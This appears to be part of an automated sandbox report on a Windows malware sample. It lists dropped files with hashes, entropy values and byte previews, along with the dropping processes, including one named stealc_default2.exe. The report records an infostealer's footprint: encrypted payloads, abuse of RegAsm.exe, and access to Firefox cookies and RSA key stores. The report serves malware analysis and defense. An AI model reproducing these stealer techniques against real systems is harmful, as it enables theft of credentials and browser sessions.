Preview:	Set Worthy=6..HoRuBrandon Alleged ..JBybInquiries Jonathan ..GPITexts ..kIaLips Motivation ..QVsCrash Interested Pocket Handheld ..rcAssuming Lid Stadium Uganda Voted Exposed Locked ..HmFsAccess Britney Verified Complement Sample Belly Native Indicate Cyber ..FOqqShelf Bucks Literature Reasonably Des Dressed Sons Accused Fuck ..xPZPExplosion ..qBFine Ranked ..Set Crew=n..QfRIChannels Vibrators Expert ..YBYBb Oz Coins Boutique Moves Instant Greenhouse Employee ..HkBSalon Jeans Screen ..tUlHolding Work Yo Floating Campaign Morgan Hs ..nRmHousewives Treatments Thomson Announced ..iNPrepared Cyber Paul Offers Buffer Using Fundamental Jeans Magnet ..Set Tee=l..OiIColumbus Restoration Informational Taking Wake Sorted ..PLSun Studios ..McXDonald Argument ..szCompressed Copies Vice ..EXTEDiscover Details Sudan ..JTYBetty Stakeholders Testimony Ur Banks Lexington Thomson Scholars ..WmAIntersection ..PBPlatforms Actors Thumbnails ..SSFNeo Facial Televisions Tsunami Dinner Dies ..lyKelkoo Elderly

C:\Users\user\AppData\Local\Temp\Corresponding

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	modified
Size (bytes):	892651
Entropy (8bit):	6.622292005060259
Encrypted:	false
SSDEEP:	12288:/pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:/T3E53Myyzl0hMf1tr7Caw8M01
MD5:	7EB7312237CF8653A876136046CE8B3E
SHA1:	250D61E72B9A6D0D436E04B569459BB69BB2AB9E
SHA-256:	FA349D460B066E9B325DB200251AE35892353462C352728CFB0FA405C293F725
SHA-512:	778FBBEC7CD5C9D2AA3623F73604FD7A6E98D3673B50AB7E8AC54C8AA3D955C103D7CDC0838E00F256ADE000C979860BF54D3D2B36DD3DCD4FE8FCA9F1C82699
Malicious:	false
Preview:	....................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(..h.C.....Y..4..h.C.....Y...L..2...h.C.....Y................SVW..j.[..l............Ky.Nl.....N(....V.;...Y_..^[...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd....j....................F\|U............[...U......Ky......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..QQ.E....I.Pj.hD.I..............f.}.1.....].U..QQ.}..SVtr.u...tk3.3.f...E.Pj.SRQ....I...uQ.E.W.<..E..}.PVSS.u..u... .I...u..E...E.;E.s.3.f..F...u.....I..._^[..].3.f.D7...2...U..SV..j.[.F.9F.u0...j.X;.sL3.F...W.......Q.....~....Y......~._S......Y..t..M......N..F.....F.^[]......3...V...N..V..F..4.......F.Y.N.^.$...V..W3.9~.....

C:\Users\user\AppData\Local\Temp\Dietary

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	7.997496526865488
Encrypted:	true
SSDEEP:	1536:W2Kcm/aSE8g+5pcwQJiCDvjkiEk1T7bmZCsbfRRzozVFb9/wHBxMJxCFF:W2w/u6AwQ9vjFjTvsCsbfRRozHgxMaFF
MD5:	30A3ED3849E36B4C26A02CF030EA985A
SHA1:	D3D29D3BA2C033D0ABB6105CD274001E65D07F4E
SHA-256:	6D86469CED96B57DB84DE11F9EAC77C8076A3BFA65942776F7CC50625FBD31CA
SHA-512:	158AABAC6F79393A2A7FAED30693F78191BF97771A6125229873ABEDCEEF71D5DF7D5BB934FDFA1FF4C683DF49A158E5BA3EFEA9A4DD10DCE8BA24B3C4FC507D
Malicious:	false
Preview:	Yy.Y...5.!..x^.h...{GHG..o.A.f0!G.....+..8.L.s7.5.>2......0Da...c1'.S'$EH...^.....w.J..b.Yt....S.l.Y..._..a...4<...jL3Y..(]U.).:d 7..W....+.....D.nJ.I.}.M}....)`.1e6.....FH<.u?':.]..$;,......)Y.r2......C..)...Bm...'.VqA...GJ.x^.YA.6]]...E.T...&&...>....k.Z.{6..#T...K.....w....T.i.l.....Q...t.X.Wo...Zp...........sz...:...7.N...1......1@Jc6.C....,.........N...Z........&.....]P.0...7p..8-.79.......R..#.mz.#.i@F.u...AL=}..l...Q..p..._.a.bi.m...X.<..$.....D..d.Q.@.L[.;/.'8.G138.i.H0...Q.=.H...(.s...';..-.k.E<..~.......1.6..... '?.&.a+.~w{...;..K..&.X..;k.'......tb.&.....a.P.=..9.{HU...:.ZPRi.<..Ei..$...8.Q.;..)....\...%..Z...Y....3#.W.....@....`...l..S..o...G....~.+1.g.^*..Vu... ..s..Kl.Y ...U^.D.p..".u.^.l..(.[.w...j. %.Cx....wx.U..+?...>0...z....,2..w.S.b....pc.+.w`3]n......._~..kim..../p...&....[.53.$.+6..&...2.x.'.0I.n.n........R.wn..U\GY9.q.[V.,."....:t.....'.R..D1z.2.....7S.i.R..lK.6..9.\.W....0.X-...3...0;..!.....-.3P67......u..X...)F.V.

C:\Users\user\AppData\Local\Temp\Minister

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.998169106690167
Encrypted:	true
SSDEEP:	3072:brklr7dwYrsHKN3Il8do2mvAY6N3eUXBcbF2n23:bm7+KsYIl8do9FYhxcbF223
MD5:	97DD60AC57E3F1873F3120688D47CD3D
SHA1:	E8941900DAC0DD9B9AC4B7A08D3ACE40C3CC9736
SHA-256:	526B6CBF430FC40EB8D23CD2C4EE1C81E04A2C9E01167370527F19465F67C452
SHA-512:	831EB3F1BD352173DB735E4F5E2A4C9380006E3146ECD466B415D7EF7E2C0A345B4DA0EBC0415043A9599859E2FB2A131E8D3FC5012D1CCC7473B0EBD4FD076A
Malicious:	false
Preview:	-../..G.h.].t.b^.+..i.<.;...Z...t(..........QQ....>...w@A.T.I..q82R...@.g...z..l0.Y.......].u.$,s...8!.. .,.E..n.:..w/..@\|...$.....~..~W.=..<...~..?.L$.j.k?.s...HQi\......m..+t.. ..AIQ.......~..#4...A.O{..x.j......v$.]+yLQ2..9Y.g{..G~qR..(84.Z../...C....t....J..@(M.gb...Wj...:NS.u.@.".G.;;..R...U........C]p.k....(..[.f.i.xH...... ........%..Cs..k.X.,....&..!..)..t1.......j.c.'.}T..._...e,..N.......?[_z.8.C.fF...{.B.X.........K#.%.....).QP.R0..c0...D..3&g...LhW....J.q.Lr.L.....'...[....`.i....xA.<..Z..]}ch...N...+eY...\|.C.d....9l...&..~.O.E.:.v..~.p=..........0.R..~=l1.G...%../..=....j......]......c...\|`~?...Z.J.z...O:D.sT..v.7....{gji.F.....iC.H..._.......@o....O.f..[.1.q.6...P.x...}&.bO..O...@v.6c.,}.........c.C......E..p......_].n.......4.X..k>.......M=..0.Kw4.....3.`....C..W[...NR.f..>...N..k.P...1_."..i.}.9...MV.....v......5..$p?09..$)-.%.../.v..X......J...\|J..9...`og..*.-.B[..(....D...K...........N.G........u.F....9=.+d..E.i....}

C:\Users\user\AppData\Local\Temp\Mobile

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	7.997847792474805
Encrypted:	true
SSDEEP:	1536:tkUl1VfagFJ8VOATq22GEpmMb0mMDKzSUW+F/scfV5Uq/FypYOaJT:tkUlfagFJcOATl2bbCDKzTWMzUCwpzG
MD5:	B81B3A6C6725BE1CDD528E5FB3A9AA07
SHA1:	069D5FD30B48BF5345D21C2AF0106325E9372C8F
SHA-256:	08E8E54417A8E7007AEEDB0399F4E549FC31AAF6031416C8D30306FE350C1F84
SHA-512:	7A04EE23C0B3D832FA518390253C0153829E7AB0907209DC67C5EAE687AD648AB18AA7D064E544C1DA3B03CC610ED10FE63A73FC5AAA129402A561843AA975E2
Malicious:	false
Preview:	.....g;rvq.<.Z....h.....149).0.+..G.%..A0....2..l.&.@...`.1/.....yz..?@.%..w..H.......5w...f.t...W.3(`H...-/....vn.../[.\|`Y.....W..S..N0.x..E_.M.....E.\.8...5..H.`..L.....K..) ..F..V.u..<)..<.C.H.q.\<.$.C.s2v:EQp8%...apr.x.....V\6.D...../-..t..+.$..F....T..}..}...i&.5D...f...!ct....H.U...-..#'L.........m..i.2.b.:E..x...Psi...=?c.>..".s...V,......i.."...>..j+..2s.th.....<X...)...\....3._...M.Z..b../...c....vK..K..@q?..d...CE..X.1..6...G.a.0.. 1v..!.S.q<...L.....:....F8...g.NZ...t...YO.......<.h.K?&..k..].W.).j....z.n.=.O.......@..B.5IG.%..\|3.8....kY.r....P=6....HrL.C..:..3..=^L.%...}{u.\|5..N...a.....".#.!..;p..+D.c.y~+.]...M.}...Wi=....6z.D*.H..\|.6..m..O.I`.9p...z....9.d......."..i...7..a......:J.F..d...].q..So.\............]7..S..f..i..<...$..j..E...\|.....P".\.b.5......../.\_...8$h2>C..F2o.....3....77...._..m.....r.iO?.l.:7...HMq.TlzGQ..+\.k...$J...@..{.1e..P...#..ct."k.[w.<)..a..Mi.?.Z.N.]83....N%V.y.HIU[..Uf..A..gn.$A.&.Y/E

C:\Users\user\AppData\Local\Temp\Mr

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	7.997663090951848
Encrypted:	true
SSDEEP:	1536:CzYfX1FH8AhbqeIKIwpZOaIitfopTBXUZDJBL7EmQyi/:MYflx8Ah0AkdTEZDJl+y+
MD5:	0C3F23378F256B116FCA366D08DBD146
SHA1:	C6C92667DEA09B7A4B2B00193EE043278854DB1E
SHA-256:	5DEFB1B1225282E2AB46D4257416334B5344E5B0A020B4B7900436C59684DE65
SHA-512:	0DB03B484CE0849BD005EC962E69FEA3F8B728739E622AD57519E9411D5257026938B9EB8DB050BB355A624F34B19BFE0E0FB8AF888BAB99D4FEBB5EC89381F3
Malicious:	false
Preview:	a...J.Q.91..`.X...f..%.L.3.W.\p.h.T..)...O.h.rs.M.v.~f.;q..Fd......#.[.....G......s.~....4...{...^om>\.......p/.S....x.`q..Z>C.b'Y.H......X..KaM......1....J/x.C......o...4I.....8.....O&....L..e......V.z..x..T..O.8H...$..(O....,{}D.b....T.j....a..._...QE....()a........G.'R.N.7H..c.......l9A.......t.".].).P{Z...y...}..!.R....`...BC.@._]..yi..b.%J.q...R..X{....eS.gNg{. wK..A@.Yc..Q.dYTap....<.P.n..j..f..?.f."=\|.f..A.....>x......3x.....".pR...NK#a.[.......f.v.7.I..i..2_~.Pf.p.V..G..(.-....x..u#~~p.....;7>.....y:\|.X..-8....B...W..p.....#.]....s.D.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....E.N.'.F...h.............~....=..~....=..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K

C:\Users\user\AppData\Local\Temp\Sonic

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	982
Entropy (8bit):	3.2340299312711625
Encrypted:	false
SSDEEP:	12:g1yGSGCbTQxbs/0pQHPZdZELq6h1p5zGbWCBl9dte4:g1yGSnPQxqtP5ELqCB8WCBl9dte4
MD5:	1B5BBA21607D9A9C3293FF564ECF4F1A
SHA1:	DE790D57FBFAE12E649BF65FD9695E36A266696A
SHA-256:	FC6BA37A8BFE546D8186E92C2F729080B00D4371EF2E8E3A18EC66ACC1CF199E
SHA-512:	B9E23DD79986397C9FE5C1AC150C60C8993F89488645F06E0865ABB2491DC3B9949867753D76CAB34352445459601C339A6F78FF8B48323951638F9666D6A74A
Malicious:	false
Preview:	HopeBuildersGeniusIslam..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Speak

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	7.997338361229477
Encrypted:	true
SSDEEP:	1536:dv/iE+BO9feoh41Cm6o2QdecHYN/TVXbC:dHi9BOEs41JN2QdtHYFFbC
MD5:	0E16CAFD2403C552149E325D90637D12
SHA1:	EFE1E6AF41751CA9978C3A21C82EF135A8846F21
SHA-256:	93DDBCD9109129656049162E3F6A8D9FFFDC5A3DA262E0A2BF2BC4624014F7B0
SHA-512:	0251DE7ABB9A4457CF16DAB0B1E88D0897C5B6655CDF27B9C298C1796925EA2514CD2F065106ECCD56B97A6804E84F459806D528837BF9718C7C9E525F7159EC
Malicious:	false
Preview:	xh.DJ6..4\W.;.......w..m.....4....:..J.,TV?.D...W6.Vw..p.V...NBv...4..&.(l1.-_.D...zl1.Go..?...%.e......t}..%..,e..ey......,..0.L..nO#..;..`."..I.3..4m..uq...f+.mdn\5@k!..(.X..ag....Q!.q.%....I3-'.....K.nO....T...6U.......O-...R.H>P...C...}....K>....Bn...:F...S..~0.$..+......W.=..Zob.#.e.6.]1[YT..'..j%.Pw....d.^._...ru........m.n.0...d).x.h..#q.b.Q.......6bb)V..6...._.TV....y....$.6J.U...w`...f......;....N.7g.Sd..f<.t_...m9....%.k....p..M..!.....r.."@./Z=-....Pj.......w.,....t...n....+.e}...4..$. ..Wt..=...G.r...O..Y.......D.'..D.nW..].;c6qp.y.....q..6..-B.$Y.&.Q..o9.........@..M^..w."G.\|.v+.....&.....Z....u.......ps['-..;.......0A.2....O.L....A.I...{.qd..+....o.......a.......D7....O,....{63@.M(.C9.#..Xc...s.iY...Sm.F6....X..**p........@...n.u...]j..TQ.B.o\./`C.p../U....;D<(...E.....jhz`0.:........o.\...[3.R.o).T..Cs..hS...;a4.G..0I..L3r..1.^.D.i."...;].=Z.....eq.....;....u."9..3..7p. ..\|..63...A........[W.^.V.-<.3.P........l.:.."d..~

C:\Users\user\AppData\Local\Temp\Template

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	7.997071461562269
Encrypted:	true
SSDEEP:	768:tgPLJcZKaNZ6vBI1RggHmYLsbPsbrdPmOHv7J3LjgmvtCXK76MPraSv6KeJeQiKb:tgPLGZJNZhnmY9rdlzJD8Zm7Qi8M6UG
MD5:	0E70F873CB8F5615DD364325B714895A
SHA1:	089A8F5D7D90E7EEDD6D02E30AA458440C89D7A7
SHA-256:	4734D4D0626E140398A788226A5985E814BBD674F4218B60A89FD2DA8F4CEB94
SHA-512:	867DBAC35991B2222F5FB4F5FC6DCA4640B386356DFF12322FDC06BB05B8AF7C438E15F9FC6B4D4CEDC27F081480D4187C1B4007831D9A052C3BEDA8D3C56AC4
Malicious:	false
Preview:	p.7....I..U.zW.q..V..+l....hS.1..aS.]GU.1...%..6.....'..9.G.......(t....)...W.iK..c..u.\|...0...t...4"P+.\|.Q..T.f=.j.$......h.....H.3.'....'..AX. ...Evi......Tj..)j.vk.le.45.Mu._...k.1..A..Eq.+{..k.....w..N'.z.KO..+U..0...4..........TK.Oac\.{6&oJv..9eu..HE3g?......Y-..)(.I...S.U .@.....9..3....[zy{..e/..gO......Q5.Bl...=.uG.y..... u....(..]V....T...$U.@.i......Y-`#.......X.!.....G._.Q........}.T.+...1t..FB..f....@ G...R.sK......9#Eo.)W.N=.9.......`..N..pkEy7..w...=i..-N..c2k..w....$ ,....A..H_..w.m...MYu...._n....A!...X...+....o'G....Jm1MWq.4...............m....... .....q.j.m.}M.o....\|...o....4...]N..M....?.3.j8c......\|...j4..{...}\c....A.[,I.j..-.n.._....W..5z.U....k....S....V...............S..A9\...@..E...Y.=<e$..s(...T..QB.Op$N.Z...\|..F...g.?.I...H......f.>.V.h%`u...;..hlD.*...C.........]P..{.t.l.i.?.u2P....l\|..P.DW....}C...v..'{...E.$.[1....Q...2..U!@}v<..k...!....Oz&.N.......^.E..F..^ .P.Q,....J!....Kt.#...Y.-...fl

C:\Users\user\AppData\Local\Temp\Tmp94BF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp94EF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpA077.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\XBckuYbXje.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpA0A7.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\XBckuYbXje.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Zinc

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	7.996873835796034
Encrypted:	true
SSDEEP:	1536:pN68Jyg4Hxj+nYKff0E5cjEYsiYFCpw/ej4j93rtJl+:ykyTHxjsYpE50EYsnuyekrtJ8
MD5:	51143491656AE2EE983D709C45A41861
SHA1:	1CF8EB8D13246195CFC6168524D212C9A65B4681
SHA-256:	DC4AAC8B9EB62788BD04316293CDE7E3D839E828E3E3082A2D81922CA8A94C81
SHA-512:	239F2903B3B5177B32971AE3EB3EAB2CC4C3D7856A3839F184C7F59B7E3CD53DE4DAC3363519E82ACD183E564AE688DC8A7E5097C1283699714584EE13BED67D
Malicious:	false
Preview:	s."9....?..'...a#MXl(.kF.o..z..."....i~\|%...^..).7{.dJ....O...#......#eX..:.dK^..,.h.v.3..x...(:.u....B.+.8.E..h]..3E.Hh........L...?.I..tQ......S.".t....o./n2.....r..U.;oR.....}$u....0....)b8...s.\..].j...H.U..&.AN...C..o.kK.LO%....N4a.J>.C3..[.eO.....]^.5#...u..V.).J).(#....W.Y...5-...f..6.!......y...p.QA,...)..~.c...X.X\|...~...../.......(....2....G..6........a.U\OK(.C.Z.\..Z....%.n...]...@.~V.s.,{=....nMCq1..h.d3D.Vy..._?..t. i....@S.v....../....B......U....W........??..+."Rd...v.GM.F5(......n.....'.X......4.0.?.....o..y3T.{F..Q.....4....q~h.Se.n..r.+.3"..z.{...EZLy..@3q....V.G...e.X;......v..6s ..,.%3..7.D~Q}..JX...Aw6..U..AUi6./p......@&.(ErU.d......#..B.K;.a....X.....f.....M.W.3X...3..'`..;......>.C....l)..^e,......#k9.te?.uI.h[..7............D..#'.]Z....;.xv....]e>tl0Yz..5c..#.*.Df....M...$.H....z.....q.Y........)"..D.\U......Uc...ek&cIj. ..{?Xr.Q.?`0...K...xGR.1Mt..../...y2....t..,....&.gn..s!.M....o.&..xi\|..;Q......@/twk

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\2b64843fdbca140c556f1518fe1ef6ab_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Roaming\XBckuYbXje.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
